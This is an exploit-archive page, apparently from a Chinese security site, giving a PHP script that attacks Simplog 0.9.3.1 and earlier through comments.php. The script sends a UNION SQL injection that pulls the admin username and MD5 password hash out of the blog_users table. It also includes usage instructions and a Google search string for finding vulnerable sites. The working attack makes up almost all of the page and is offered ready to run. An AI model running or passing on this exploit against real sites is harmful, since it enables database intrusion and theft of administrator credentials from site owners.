首页    新闻    下载    文档    论坛     最新漏洞    黑客教程    数据库    搜索    小榕软件实验室怀旧版    星际争霸WEB版    最新IP准确查询   
名称: 密码:      忘记密码  马上注册
0day :: oday

Simplog <= 0.9.3.1 comments.php Remote SQL Injection Exploit


http://www.gipsky.com/
#!/usr/bin/php
<?php
/*********************************************************************
* Simplog 0.9.3.1 Remote SQL Injection Vulnerability
*
* Note:
* Requires at least one blog entry to be made prior to injection
*
* Usage:
* php script.php [host] [path] [user id]
*
* Usage Example:
* php script.php domain.com /simplog/ 1
*
* Googledork:
* intext:Powered by Simplog
*
* Credits:
* Disfigure - Vulnerability research and discovery
* Synsta - Exploit scripting
*
* [w4ck1ng] - w4ck1ng.com
*********************************************************************/

if(!$argv[3 ]){
die("Usage:
php $argv[0] [host] [path] [user id]\n
Usage Example:
php $argv[0] domain.com /simplog/ 1\n");
}

if($argv[3]){

function send($host, $put){
global $data;
$conn = fsockopen( gethostbyname($host),"80" );
if(!$conn) {
die("Connection to $host failed...");
}else{
fputs($conn, $put);
}
while(!feof($conn)) {
$data .=fgets( $conn);
}
fclose($conn);
return $data;
}

$host = $argv[ 1];
$path = $argv[ 2];
$userid = $argv[ 3];

$sql = urlencode( "-1 union select 9,9,9,login,9,password,9,9 from blog_users where admin=$userid");
$req = "GET ". $path."comments.php?op=edit&cid=". "$sql HTTP/1.1\r\n";
$req .= "Host: $host\r\n";
//$req .= "Content-Type: application/x-www-form-urlencoded\r\n";
$req .= "Content-Type: text/plain\r\n" ;
$req .= "Connection: Close\r\n\r\n" ;
send("$host", "$req");

$aname = explode( "><input type=text name=cname maxlength=64 value=\"",$data);
$bname = explode( "\">",$aname[1 ]);
$name = $bname[ 0];
$ahash = explode( "<textarea name=comment rows=10 cols=40 wrap=physical>",$data);
$bhash = explode( "</textarea>",$ahash[1 ]);
$hash = $bhash[ 0];

if(strlen($hash) != 32){
die("Exploit failed..\n");
}else{
die("Username: $name MD5: $hash\n");
}
}
?>

[2006-10-16]
<< Comdev One Admin 4.1 adminfoot.php Remote Code Execution Exploit Boonex Dolphin <= 5.2 index.php Remote Code Execution Exploit >>
API:
gipsky.com & 安信网络

系统导航

 

Copyright © 2001-2010 安信网络. All Rights Reserved
京ICP备05056747号